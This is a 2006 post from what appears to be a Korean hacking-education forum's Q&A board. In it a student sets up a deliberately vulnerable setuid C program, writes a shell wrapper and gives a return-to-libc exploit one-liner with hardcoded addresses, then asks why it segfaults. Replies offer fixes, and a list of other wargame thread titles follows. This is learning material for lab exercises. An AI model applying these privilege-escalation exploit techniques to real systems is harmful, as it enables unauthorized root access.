시스템 해킹

1574,

1/79

randomkid

쉘이 안떨어 집니다. 고수분들 제발 도와 주세요 .ㅠㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=615 [복사]

달고나님의 스택오버플로우의 기초중에서 return into libc부분입니다.

일단 아이디 level9로 접속을 해서
다음과 같이 파일을 만들었습니다.(파일명은 vul.c)
int main(int argc,char *argv[])
{
      char buf[7];
      strcpy(buf,argv[1]);
      return 0;
}
chmod u+s vul을 걸었습니다.

그 다음 level11로 접속을 해서
다음과 같이 shell.c파일을 작성했습니다.

int main()
{
  setreuid(geteuid(),geteuid());
  setregid(getegid(),getegid());

  execl("/bin/bash","sh",0);
}
그 다음 execl의 libc위치를 알아냈습니다.(0x400d16c0)
그리고 gdb로 vul을 열어서 외부인자의 시작 주소값을 알아냈습니다.(0xbffffb34)

그래서 공격 코드를 다음과 같이 넣었습니다.
./vul `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`
그런데 세그먼트 폴트가 자꾸 뜹니다. ㅠ.ㅠ

gdb로 r `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`이렇게 넣고 하나씩 확인해봤는데요
ebp에 0xbffffb34가 제대로 들어가고 리턴 어드레스 부분에 execl까지 들어가는걸 확인했는데 안됩니다. ㅠ.ㅠ

이거 3일째 날새고 있습니다. 앞으로 보안쪽으로 취업을 할 대학생인데 이런 문제에서 막히니까 정말 울고 싶을 지경입니다.

프로그램의 에러는 하나도 없습니다.(일일이 컴파일 다 해봤습니다.)

아무리 생각을 해도 몰라서 글을 올립니다. 부탁드립니다.

Hit : 3379 Date : 2006/09/04 05:30


bugfixer2	세그먼트 뜨신다면.. 'A'x24 부분을 고쳐보시다보면 나오곘죠? 물론.. 나머지 주소값들이 정확할경우	2006/09/09
awsedr45	aX24 system(주소) exit(주소) bin/sh(주소)	2006/09/09
awsedr45	아니면 ps -a 명령어를 해보세요 bash 쉘이 있을수도	2006/09/09

1574

pwnable.kr echo1 질문2 (스포 주의)[2]

turttle2s

10/05

1236

1573

LOB GATE문제 풀면서 궁금한점[3]

hackxx123

08/24

936

1572

libc관련 - 2[5]

lMaxl04

08/24

882

1571

ASLR이 걸려있을때 ret에 ROP으로 jmp %esp을 사용한 경우.[3]

lMaxl04

06/29

1146

1570

리모트 환경에서의 스택 주소 확인 방법이 궁금합니다.[2]

lMaxl04

06/16

943

1569

해킹 프리서버 없어졌나요?[1]

terfkim

04/15

1722

1568

스택에 데이터 넣을 때 SIGSEGV[4]

turttle2s

02/04

1452

1567

pwnable.kr echo1 질문[2]

turttle2s

06/17

1726

1566

ROP strcpy 관련 질문입니다.[3]

heeyoung0511

06/16

1572

1565

Level2 -> Level3 에서 vi와 /usr/bin/Editor의 차이[2]

hyemin1826

07/18

1841

1564

Trainer3 ftz.hackerschool.org 호스트 접속 불가[1]

hyemin1826

07/18

3216

1563

dll인젝션 실험중 질문 드립니다.[1]

kkk477

05/31

1847

1562

패킷 복호화를 마스터 하려면 어떤 과정이 있어야하나요?

sa0814

04/01

1692

1561

사기[2]

jas08

03/31

1991

1560

시스템 콜이 가능한 메모리 영역과 불가능한 메모리 영역이 존재하나요?

ocal

03/30

1732

1559

pwntools 사용시와 기본 socket 모듈 이용시 차이?[4]

ocal

01/09

2272

1558

lob level19(nightmare) 관련질문[1]

dnjsdnwja

12/18

1739

1557

ftz level2 질문있습니다[1]

kihyun1998

12/13

1829

1556

ftz level2번 푸는데요 권한이...

kihyun1998

12/06

1705

1555

시스템해킹할때 [3]

thsrhkdwns

12/05

2187

1 [2][3][4][5][6][7][8][9][10]..[79]